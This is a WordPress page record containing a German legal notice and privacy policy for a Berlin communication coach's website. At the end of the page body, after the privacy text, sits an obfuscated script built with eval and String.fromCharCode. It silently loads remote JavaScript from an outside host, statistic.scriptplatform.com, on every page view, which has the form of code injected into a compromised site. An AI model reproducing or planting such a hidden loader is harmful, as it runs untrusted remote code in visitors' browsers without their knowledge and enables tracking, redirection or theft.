{"id":21086,"date":"2018-09-16T16:18:17","date_gmt":"2018-09-16T14:18:17","guid":{"rendered":"https:\/\/annehodgson.de\/?page_id=21086"},"modified":"2018-09-16T17:16:45","modified_gmt":"2018-09-16T15:16:45","slug":"impressum-und-datenschutz-2","status":"publish","type":"page","link":"https:\/\/annehodgson.de\/de\/impressum-und-datenschutz-2\/","title":{"rendered":"Impressum und Datenschutz"},"content":{"rendered":"<h3>Impressum<\/h3>\n<p>Anne Hodgson<br \/>\nOnkel-Br\u00e4sig-Str. 49<br \/>\n12359 Berlin<br \/>\nTelefon: 0179\/ 46 86 249<br \/>\nE-Mail: <a href=\"mailto:hello@annehodgson.de\">hello@annehodgson.de<\/a><br \/>\nWebsite: <a href=\"http:\/\/annehodgson.de\">https:\/\/annehodgson.de<\/a><\/p>\n<p>UST-ID-Nr. DE 225812920 Finanzamt Berlin<\/p>\n<h3><strong>Urheberrechtshinweise<\/strong><\/h3>\n<p>Alle Texte, Bilder und Tondateien auf dieser Site sind weltweit urheberrechtlich gesch\u00fctzt. Die Verwendung der Inhalte dieser Site bedarf einer schriftlichen Genehmigung durch den Verantwortlichen dieser Site. Die auf dieser Site genannten Produktbezeichnungen oder Firmennamen sind Eigentum der jeweiligen Inhaber und unterliegen als solche dem gesetzlichen warenzeichen-, marken- und\/oder patentrechtlichen Schutz. Ein Gegendarstellungsanspruch gilt nur im Sinne des \u00a756 RStV. Wir weisen darauf hin, dass auf der Website enthaltene Bilder teilweise dem Urheberrecht Dritter unterliegen.<\/p>\n<h3><strong>Haftungsausschluss<\/strong><\/h3>\n<p>Die Inhalte unserer Seiten wurden mit gr\u00f6\u00dfter Sorgfalt erstellt. F\u00fcr die Richtigkeit, Vollst\u00e4ndigkeit und Aktualit\u00e4t der Inhalte k\u00f6nnen wir jedoch keine Gew\u00e4hr \u00fcbernehmen. Unser Angebot enth\u00e4lt Links zu externen Webseiten Dritter, auf deren Inhalte wir keinen Einfluss haben. Deshalb k\u00f6nnen wir f\u00fcr diese fremden Inhalte auch keine Gew\u00e4hr \u00fcbernehmen. F\u00fcr die Inhalte der verlinkten Seiten ist stets der jeweilige Anbieter oder Betreiber der Seiten verantwortlich. Die verlinkten Seiten wurden zum Zeitpunkt der Verlinkung auf m\u00f6gliche Rechtsverst\u00f6\u00dfe \u00fcberpr\u00fcft. Rechtswidrige Inhalte waren zum Zeitpunkt der Verlinkung nicht erkennbar. Eine permanente inhaltliche Kontrolle der verlinkten Seiten ist jedoch ohne konkrete Anhaltspunkte einer Rechtsverletzung nicht zumutbar. Bei Bekanntwerden von Rechtsverletzungen werden wir derartige Links umgehend entfernen.<\/p>\n<h3><strong>Datenschutzerkl\u00e4rung<\/strong><\/h3>\n<p>Ihre Daten werden bei uns streng vertraulich und in \u00dcbereinstimmung mit den einschl\u00e4gigen datenschutzrechtlichen Bestimmungen behandelt. Den Schutz Ihrer pers\u00f6nlichen Daten nehmen wir ernst, auch anl\u00e4sslich Ihres Besuchs auf unserer Homepage. Ihre Daten werden so gesch\u00fctzt, wie es die gesetzlichen Vorschriften, insbesondere das aktuelle Telemediengesetz EU-DSGVO vorsehen. Nachfolgend finden Sie Informationen, welche Daten w\u00e4hrend Ihres Besuches auf der Homepage erfasst und wie diese genutzt werden.<\/p>\n<h3>Welche personenbezogenen Daten wir erheben und warum wir sie erheben<\/h3>\n<h3>Kommentare<\/h3>\n<p>Wenn Besucher Kommentare auf der Website hinterlassen, sammeln wir die im Kommentarfeld angezeigten Daten sowie die IP-Adresse des Besuchers und die Zeichenfolge des Browser-Benutzers, um die Spam-Erkennung zu unterst\u00fctzen.<\/p>\n<p>Ein anonymisierter String, der aus Ihrer E-Mail-Adresse erstellt wurde (auch Hash genannt), kann dem Gravatar-Dienst zur Verf\u00fcgung gestellt werden, um zu sehen, ob Sie ihn verwenden. Die Gravatar Datenschutzerkl\u00e4rung finden Sie hier: https:\/\/automattic.com\/privacy\/. Nach der Genehmigung Ihres Kommentars ist Ihr Profilbild f\u00fcr die \u00d6ffentlichkeit im Rahmen Ihres Kommentars sichtbar.<\/p>\n<h3>Medien<\/h3>\n<p>Wenn Sie Bilder auf die Website hochladen, sollten Sie es vermeiden, Bilder mit eingebetteten Ortsdaten (EXIF-GPS) hochzuladen. Besucher der Website k\u00f6nnen beliebige Standortdaten aus den Bildern der Website herunterladen und extrahieren.<\/p>\n<h3>Cookies<\/h3>\n<p>Wenn Sie einen Kommentar auf unserer Website hinterlassen, k\u00f6nnen Sie sich daf\u00fcr entscheiden, Ihren Namen, Ihre E-Mail-Adresse und Ihre Website in Cookies zu speichern. Diese sind f\u00fcr Ihre Bequemlichkeit, so dass Sie Ihre Daten nicht erneut eingeben m\u00fcssen, wenn Sie einen anderen Kommentar hinterlassen. Diese Cookies halten ein Jahr lang.<\/p>\n<p>Wenn Sie ein Konto haben und sich auf dieser Website anmelden, setzen wir ein tempor\u00e4res Cookie, um festzustellen, ob Ihr Browser Cookies akzeptiert. Dieses Cookie enth\u00e4lt keine pers\u00f6nlichen Daten und wird verworfen, wenn Sie Ihren Browser schlie\u00dfen.<\/p>\n<p>Wenn Sie sich einloggen, richten wir auch mehrere Cookies ein, um Ihre Anmeldedaten und Ihre Bildschirmanzeigeoptionen zu speichern. Die Anmelde-Cookies halten zwei Tage und die Bildschirmoptionen dauern ein Jahr. Wenn Sie &#8222;Remember Me&#8220; w\u00e4hlen, bleibt Ihr Login f\u00fcr zwei Wochen bestehen. Wenn Sie sich von Ihrem Konto abmelden, werden die Anmelde-Cookies entfernt.<\/p>\n<p>Wenn Sie einen Artikel bearbeiten oder ver\u00f6ffentlichen, wird ein zus\u00e4tzliches Cookie in Ihrem Browser gespeichert. Dieses Cookie enth\u00e4lt keine pers\u00f6nlichen Daten und zeigt lediglich die Post-ID des gerade bearbeiteten Artikels an. Sie verf\u00e4llt nach 1 Tag.<\/p>\n<h3>Eingebettete Inhalte von anderen Websites<\/h3>\n<p>Artikel auf dieser Website k\u00f6nnen eingebettete Inhalte enthalten (z.B. Videos, Bilder, Artikel, etc.). Eingebettete Inhalte von anderen Websites verhalten sich genau so, als ob der Besucher die andere Website besucht h\u00e4tte.<\/p>\n<p>Diese Websites k\u00f6nnen Daten \u00fcber Sie sammeln, Cookies verwenden, zus\u00e4tzliche Verfolgung durch Dritte einbetten und Ihre Interaktion mit diesen eingebetteten Inhalten \u00fcberwachen, einschlie\u00dflich der Verfolgung Ihrer Interaktion mit den eingebetteten Inhalten, wenn Sie \u00fcber ein Konto verf\u00fcgen und auf dieser Website angemeldet sind.<\/p>\n<h3>Analytik<\/h3>\n<p>Diese Website benutzt Google Analytics, einen Webanalysedienst der Google Inc. (\u201eGoogle\u201c). Google Analytics verwendet sog. \u201eCookies\u201c, Textdateien, die auf Ihrem Computer gespeichert werden und die eine Analyse der Benutzung der Website durch Sie erm\u00f6glichen. Die durch den Cookie erzeugten Informationen \u00fcber Ihre Benutzung dieser Website werden in der Regel an einen Server von Google in den USA \u00fcbertragen und dort gespeichert.<\/p>\n<p>Im Falle der Aktivierung der IP-Anonymisierung auf dieser Webseite, wird Ihre IP-Adresse von Google jedoch innerhalb von Mitgliedstaaten der Europ\u00e4ischen Union oder in anderen Vertragsstaaten des Abkommens \u00fcber den Europ\u00e4ischen Wirtschaftsraum zuvor gek\u00fcrzt. Nur in Ausnahmef\u00e4llen wird die volle IP-Adresse an einen Server von Google in den USA \u00fcbertragen und dort gek\u00fcrzt. Die IP-Anonymisierung ist auf dieser Website aktiv. Im Auftrag des Betreibers dieser Website wird Google diese Informationen benutzen, um Ihre Nutzung der Website auszuwerten, um Reports \u00fcber die Websiteaktivit\u00e4ten zusammenzustellen und um weitere mit der Websitenutzung und der Internetnutzung verbundene Dienstleistungen gegen\u00fcber dem Websitebetreiber zu erbringen.<\/p>\n<p>Die im Rahmen von Google Analytics von Ihrem Browser \u00fcbermittelte IP-Adresse wird nicht mit anderen Daten von Google zusammengef\u00fchrt. Sie k\u00f6nnen die Speicherung der Cookies durch eine entsprechende Einstellung Ihrer Browser-Software verhindern; wir weisen Sie jedoch darauf hin, dass Sie in diesem Fall gegebenenfalls nicht s\u00e4mtliche Funktionen dieser Website vollumf\u00e4nglich werden nutzen k\u00f6nnen. Sie k\u00f6nnen dar\u00fcber hinaus die Erfassung der durch das Cookie erzeugten und auf Ihre Nutzung der Website bezogenen Daten (inkl. Ihrer IP-Adresse) an Google sowie die Verarbeitung dieser Daten durch Google verhindern, indem Sie das unter dem folgenden Link verf\u00fcgbare Browser-Plugin herunterladen und installieren: <a href=\"http:\/\/tools.google.com\/dlpage\/gaoptout?hl=de\" target=\"_blank\" rel=\"noopener\">http:\/\/tools.google.com\/dlpage\/gaoptout?hl=de<\/a>.<\/p>\n<h3>Wie lange wir Ihre Daten speichern<\/h3>\n<p>Wenn Sie einen Kommentar hinterlassen, bleiben der Kommentar und seine Metadaten unbegrenzt erhalten. Auf diese Weise k\u00f6nnen wir Folgekommentare automatisch erkennen und genehmigen, anstatt sie in einer Moderationswarteschlange zu halten.<\/p>\n<p>F\u00fcr Benutzer, die sich auf unserer Website registrieren (falls vorhanden), speichern wir auch die pers\u00f6nlichen Daten, die sie in ihrem Benutzerprofil angeben. Alle Benutzer k\u00f6nnen ihre pers\u00f6nlichen Daten jederzeit einsehen, bearbeiten oder l\u00f6schen (au\u00dfer sie k\u00f6nnen ihren Benutzernamen nicht \u00e4ndern). Website-Administratoren k\u00f6nnen diese Informationen auch einsehen und bearbeiten.<\/p>\n<h3><b>Ihre Rechte auf Auskunft, Berichtigung, Sperre, L\u00f6schung und Widerspruch<\/b><\/h3>\n<p>Sie haben das Recht, jederzeit Auskunft \u00fcber Ihre bei uns gespeicherten personenbezogenen Daten zu erhalten. Ebenso haben Sie das Recht auf Berichtigung, Sperrung oder, abgesehen von der vorgeschriebenen Datenspeicherung zur Gesch\u00e4ftsabwicklung, L\u00f6schung Ihrer personenbezogenen Daten. Bitte wenden Sie sich dazu direkt an uns.<\/p>\n<p>Damit eine Sperre von Daten jederzeit ber\u00fccksichtigt werden kann, m\u00fcssen diese Daten zu Kontrollzwecken in einer Sperrdatei vorgehalten werden. Sie k\u00f6nnen auch die L\u00f6schung der Daten verlangen, soweit keine gesetzliche Archivierungsverpflichtung besteht. Soweit eine solche Verpflichtung besteht, sperren wir Ihre Daten auf Wunsch.<\/p>\n<p>Sie k\u00f6nnen \u00c4nderungen oder den Widerruf einer Einwilligung durch entsprechende Mitteilung an uns mit Wirkung f\u00fcr die Zukunft vornehmen.<\/p>\n<h3>Verarbeitung Ihrer Daten<\/h3>\n<p>Besucherkommentare k\u00f6nnen durch einen automatischen Spam-Erkennungsdienst \u00fcberpr\u00fcft werden.<\/p>\n<h3><b>\u00c4nderung unserer Datenschutzbestimmungen<\/b><\/h3>\n<p>Wir behalten uns vor, diese Datenschutzerkl\u00e4rung gelegentlich anzupassen, damit sie stets den aktuellen rechtlichen Anforderungen entspricht oder um \u00c4nderungen unserer Leistungen in der Datenschutzerkl\u00e4rung umzusetzen, z. B. bei der Einf\u00fchrung neuer Services. F\u00fcr Ihren erneuten Besuch gilt dann die neue Datenschutzerkl\u00e4rung.<\/p>\n<p>&nbsp;<script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Impressum Anne Hodgson Onkel-Br\u00e4sig-Str. 49 12359 Berlin Telefon: 0179\/ 46 86 249 E-Mail: hello@annehodgson.de Website: https:\/\/annehodgson.de UST-ID-Nr. DE 225812920 Finanzamt Berlin Urheberrechtshinweise Alle Texte, Bilder und Tondateien auf dieser Site sind weltweit urheberrechtlich gesch\u00fctzt. Die Verwendung der Inhalte dieser Site bedarf einer schriftlichen Genehmigung durch den Verantwortlichen dieser Site. Die auf dieser Site genannten Produktbezeichnungen [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"elementor_header_footer","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"jetpack_post_was_ever_published":false,"footnotes":""},"class_list":["post-21086","page","type-page","status-publish","hentry"],"aioseo_notices":[],"jetpack_shortlink":"https:\/\/wp.me\/P7guBI-5u6","jetpack-related-posts":[{"id":24384,"url":"https:\/\/annehodgson.de\/de\/zu-mir\/","url_meta":{"origin":21086,"position":0},"title":"Zu mir","author":"Anne","date":"September 7, 2022","format":false,"excerpt":"Zu mir Sie suchen Training oder Coaching? Kommen wir doch ins Gespr\u00e4ch \u2013 am Telefon 0179\/ 46 86 249 oder \u00fcber E-Mail:hello@annehodgson.de.Ich trainiere und coache Einzelpersonen und Gruppen, die in einem internationalen beruflichen Umfeld in Deutschland arbeiten und sich ihren beruflichen Herausforderungen stellen. Mein besonderer Schwerpunkt liegt auf effektiver und\u2026","rel":"","context":"\u00c4hnlicher Beitrag","block_context":{"text":"\u00c4hnlicher Beitrag","link":""},"img":{"alt_text":"Anne Hodgson","src":"https:\/\/i0.wp.com\/annehodgson.de\/wp-content\/uploads\/2022\/08\/Anne_couch_backlit-1024x768.jpg?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/annehodgson.de\/wp-content\/uploads\/2022\/08\/Anne_couch_backlit-1024x768.jpg?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/annehodgson.de\/wp-content\/uploads\/2022\/08\/Anne_couch_backlit-1024x768.jpg?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/annehodgson.de\/wp-content\/uploads\/2022\/08\/Anne_couch_backlit-1024x768.jpg?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":24260,"url":"https:\/\/annehodgson.de\/de\/systemisches-coaching\/","url_meta":{"origin":21086,"position":1},"title":"Systemisches Coaching","author":"Anne","date":"September 7, 2022","format":false,"excerpt":"Systemisches Coaching und Mediation Gespr\u00e4che \u00fcber F\u00fchrung und Kommunikation Wie kommunizieren Sie im Beruf? Was kommt in Ihrem Umfeld an? Gibt es etwas, das Ihre Botschaften verwirrt und Sie daher beruflich und pers\u00f6nlich zur\u00fcckh\u00e4lt? Vielleicht sind nicht Ihre Sprachkenntnisse das Problem. Coaching hilft Ihnen, ein Gespr\u00e4ch mit sich selbst zu\u2026","rel":"","context":"\u00c4hnlicher Beitrag","block_context":{"text":"\u00c4hnlicher Beitrag","link":""},"img":{"alt_text":"Individual coaching 2","src":"https:\/\/i0.wp.com\/annehodgson.de\/wp-content\/uploads\/2022\/08\/Coaching_AnneI-2-scaled.jpeg?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/annehodgson.de\/wp-content\/uploads\/2022\/08\/Coaching_AnneI-2-scaled.jpeg?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/annehodgson.de\/wp-content\/uploads\/2022\/08\/Coaching_AnneI-2-scaled.jpeg?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/annehodgson.de\/wp-content\/uploads\/2022\/08\/Coaching_AnneI-2-scaled.jpeg?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/annehodgson.de\/wp-content\/uploads\/2022\/08\/Coaching_AnneI-2-scaled.jpeg?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/annehodgson.de\/wp-content\/uploads\/2022\/08\/Coaching_AnneI-2-scaled.jpeg?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":24308,"url":"https:\/\/annehodgson.de\/de\/lektorat-und-uebersetzung\/","url_meta":{"origin":21086,"position":2},"title":"Lektorat und \u00dcbersetzung","author":"Anne","date":"September 7, 2022","format":false,"excerpt":"Lektorat & \u00dcbersetzung Reden und Pr\u00e4sentationen Vorbereitung Ihrer Ansprache vom ersten Entwurf bis zur ausgefeilten Endfassung unter Verwendung der W\u00f6rter, die Sie gut beherrschen und die Ihnen leicht von der Zunge gehen. Finden Sie Ihre Stimme auf Englisch. Wissenschaftskommunikation Wir unterst\u00fctzen Sie bei der \u00dcberarbeitung Ihrer Forschungsergebnisse f\u00fcr die Ver\u00f6ffentlichung.\u2026","rel":"","context":"\u00c4hnlicher Beitrag","block_context":{"text":"\u00c4hnlicher Beitrag","link":""},"img":{"alt_text":"Berlin","src":"https:\/\/i0.wp.com\/annehodgson.de\/wp-content\/uploads\/2022\/08\/Berlin-scaled.jpeg?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/annehodgson.de\/wp-content\/uploads\/2022\/08\/Berlin-scaled.jpeg?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/annehodgson.de\/wp-content\/uploads\/2022\/08\/Berlin-scaled.jpeg?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/annehodgson.de\/wp-content\/uploads\/2022\/08\/Berlin-scaled.jpeg?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/annehodgson.de\/wp-content\/uploads\/2022\/08\/Berlin-scaled.jpeg?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/annehodgson.de\/wp-content\/uploads\/2022\/08\/Berlin-scaled.jpeg?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":24243,"url":"https:\/\/annehodgson.de\/de\/englischkurse\/","url_meta":{"origin":21086,"position":3},"title":"Englischkurse","author":"Anne","date":"September 7, 2022","format":false,"excerpt":"Englischkurse Einzeltraining f\u00fcr den Arbeitsplatz Sie sprechen mit Kolleg:innen und Gesch\u00e4ftspartner:innen aus aller Welt und wollen Ihre Arbeit bestm\u00f6glich erledigen - und zwar auf Englisch. Ich wei\u00df, was das bedeutet: Englisch ist Ihnen schon irgendwie vertraut und Sie k\u00f6nnen sich einigerma\u00dfen durchschlagen, aber Sie holen sich dabei gelegentlich ein blaues\u2026","rel":"","context":"\u00c4hnlicher Beitrag","block_context":{"text":"\u00c4hnlicher Beitrag","link":""},"img":{"alt_text":"Language training with Lego","src":"https:\/\/i0.wp.com\/annehodgson.de\/wp-content\/uploads\/2022\/08\/FHI_games1-scaled.jpg?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/annehodgson.de\/wp-content\/uploads\/2022\/08\/FHI_games1-scaled.jpg?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/annehodgson.de\/wp-content\/uploads\/2022\/08\/FHI_games1-scaled.jpg?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/annehodgson.de\/wp-content\/uploads\/2022\/08\/FHI_games1-scaled.jpg?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/annehodgson.de\/wp-content\/uploads\/2022\/08\/FHI_games1-scaled.jpg?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/annehodgson.de\/wp-content\/uploads\/2022\/08\/FHI_games1-scaled.jpg?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":24301,"url":"https:\/\/annehodgson.de\/de\/teamentwicklung\/","url_meta":{"origin":21086,"position":4},"title":"Teamentwicklung","author":"Anne","date":"September 7, 2022","format":false,"excerpt":"Teamentwicklung mit Fierce Was hei\u00dft \"fierce\"? \"Fierce Conversations\" ist ein praktischer Methodenkoffer, um Probleme kreativer zu l\u00f6sen, mit schwierigen Menschen souver\u00e4ner umzugehen, Priorit\u00e4ten zu setzen und ein hohes Arbeitspensum effizienter zu bew\u00e4ltigen. Als Ansatz der Gespr\u00e4chsf\u00fchrung hilft Fierce F\u00fchrungskr\u00e4ften, leistungsstarke Teams zu entwickeln und eine Kultur des Vertrauens zu schaffen.\u2026","rel":"","context":"\u00c4hnlicher Beitrag","block_context":{"text":"\u00c4hnlicher Beitrag","link":""},"img":{"alt_text":"Fearless and Fierce","src":"https:\/\/i0.wp.com\/annehodgson.de\/wp-content\/uploads\/2022\/08\/Fearless_Fierce-2.jpeg?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/annehodgson.de\/wp-content\/uploads\/2022\/08\/Fearless_Fierce-2.jpeg?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/annehodgson.de\/wp-content\/uploads\/2022\/08\/Fearless_Fierce-2.jpeg?resize=525%2C300&ssl=1 1.5x"},"classes":[]},{"id":24212,"url":"https:\/\/annehodgson.de\/de\/","url_meta":{"origin":21086,"position":5},"title":"Homepage","author":"Anne","date":"September 7, 2022","format":false,"excerpt":"Englischkurse Kommunikation Blog Zu mir Systemisches Coaching Teamentwicklung Willkommen! Aufgewachsen bin ich in Washington DC, wo wir zuhause und an der Schule Deutsch und Englisch sprachen. Seit 1998 bin ich als Kommunikationscoach t\u00e4tig. Von Berlin aus unterst\u00fctze ich Menschen, die internationalen Berufen in Wirtschaft und Wissenschaft nachgehen. Wie kann ich\u2026","rel":"","context":"\u00c4hnlicher Beitrag","block_context":{"text":"\u00c4hnlicher Beitrag","link":""},"img":{"alt_text":"About me","src":"https:\/\/i0.wp.com\/annehodgson.de\/wp-content\/uploads\/2022\/08\/Anne-neat-scaled.jpg?fit=1200%2C900&ssl=1&resize=350%2C200","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/annehodgson.de\/wp-content\/uploads\/2022\/08\/Anne-neat-scaled.jpg?fit=1200%2C900&ssl=1&resize=350%2C200 1x, https:\/\/i0.wp.com\/annehodgson.de\/wp-content\/uploads\/2022\/08\/Anne-neat-scaled.jpg?fit=1200%2C900&ssl=1&resize=525%2C300 1.5x, https:\/\/i0.wp.com\/annehodgson.de\/wp-content\/uploads\/2022\/08\/Anne-neat-scaled.jpg?fit=1200%2C900&ssl=1&resize=700%2C400 2x, https:\/\/i0.wp.com\/annehodgson.de\/wp-content\/uploads\/2022\/08\/Anne-neat-scaled.jpg?fit=1200%2C900&ssl=1&resize=1050%2C600 3x"},"classes":[]}],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/annehodgson.de\/de\/wp-json\/wp\/v2\/pages\/21086","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/annehodgson.de\/de\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/annehodgson.de\/de\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/annehodgson.de\/de\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/annehodgson.de\/de\/wp-json\/wp\/v2\/comments?post=21086"}],"version-history":[{"count":2,"href":"https:\/\/annehodgson.de\/de\/wp-json\/wp\/v2\/pages\/21086\/revisions"}],"predecessor-version":[{"id":21097,"href":"https:\/\/annehodgson.de\/de\/wp-json\/wp\/v2\/pages\/21086\/revisions\/21097"}],"wp:attachment":[{"href":"https:\/\/annehodgson.de\/de\/wp-json\/wp\/v2\/media?parent=21086"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}